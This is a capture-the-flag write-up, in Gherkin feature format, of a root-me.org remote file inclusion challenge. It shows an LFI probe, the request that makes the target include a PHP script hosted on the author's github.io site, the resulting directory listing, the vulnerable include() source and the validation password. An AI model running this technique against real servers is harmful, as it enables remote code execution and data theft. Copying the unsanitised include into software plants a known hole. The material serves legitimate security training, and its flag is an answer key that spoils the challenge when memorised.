## Version 2.0
## language: en

Feature: web-server-remote-file-inclusion
  Site:
    root-me.org
  User:
    ununicornio
  Goal:
    Get the PHP source code

  Background:
  Hacker's software:
    | <Software name>       | <Version> |
    | Kali Linux            | 2017.3    |
    | Firefox Quantum       | 64.0b14   |

  Scenario: Success:rfi
    Given I go to the challenge link
    """
    http://challenge01.root-me.org/web-serveur/ch13/?lang=en
    """
    Then I go there and see a page that lets you select a language
    Then I try LFI passing "../ch13/index.php" to the lang parameter
    And I get an error message
    """
    Warning: include(../ch13/index.php_lang.php): failed to open stream: No such
    file or directory in /challenge/web-serveur/ch13/index.php on line 18
    Warning: include(): Failed opening '../ch13/index.php_lang.php' for
    inclusion (include_path='.:/usr/share/php') in /challenge/web-serveur/ch13
    /index.php on line 18
    """
    Then I notice the target appends "_lang.php" to the filename to include
    Then I create a PHP script to list files in the web directory
    And upload it to "https://simongomez95.github.io/rfils.txt_lang.php"
    And I try RFI on the target
    """
    http://challenge01.root-me.org/web-serveur/ch13/
    ?lang=https://simongomez95.github.io/rfils.txt
    """
    Then I get the folder contents as output
    """
    array(9) { [0]=> string(1) "." [1]=> string(2) ".." [2]=> string(10)
    "._firewall" [3]=> string(22) "._nginx.http-level.inc" [4]=> string(24)
    "._nginx.server-level.inc" [5]=> string(18) "._php-fpm.pool.inc" [6]=>
    string(11) "en_lang.php" [7]=> string(11) "fr_lang.php" [8]=> string(9)
    "index.php" }"
    """
    Then I modify my malicious script to echo the contents of
    """
    index.php
    and
    en_lang.php
    """
    And I reload the page
    Then I get the output
    """
    array(9) { [0]=> string(1) "." [1]=> string(2) ".." [2]=> string(10) "._fire
    wall" [3]=> string(22) "._nginx.http-level.inc" [4]=> string(24) "._nginx.se
    rver-level.inc" [5]=> string(18) "._php-fpm.pool.inc" [6]=> string(11) "en_l
    ang.php" [7]=> string(11) "fr_lang.php" [8]=> string(9) "index.php" } string
    (657) "
    : ">Français  |  ">English

    " string(128) " 'Language', 'welcome' => 'Welcome on our new website!', );
    ?> "
    : Français  |  English
    """
    Then I check the page sourcecode
    And I get the flag as a comment in "index.php"
    """
    <?php

    /*

    Congratz!

    Le mot de passe de validation est :
    The validation password is :

    R3m0t3_iS_r3aL1y_3v1l

    */

    $language="en";
    if ( isset($_GET["lang"]) ){
        $language = $_GET["lang"];
    }
    include($language."_lang.php");
    ?>
    """
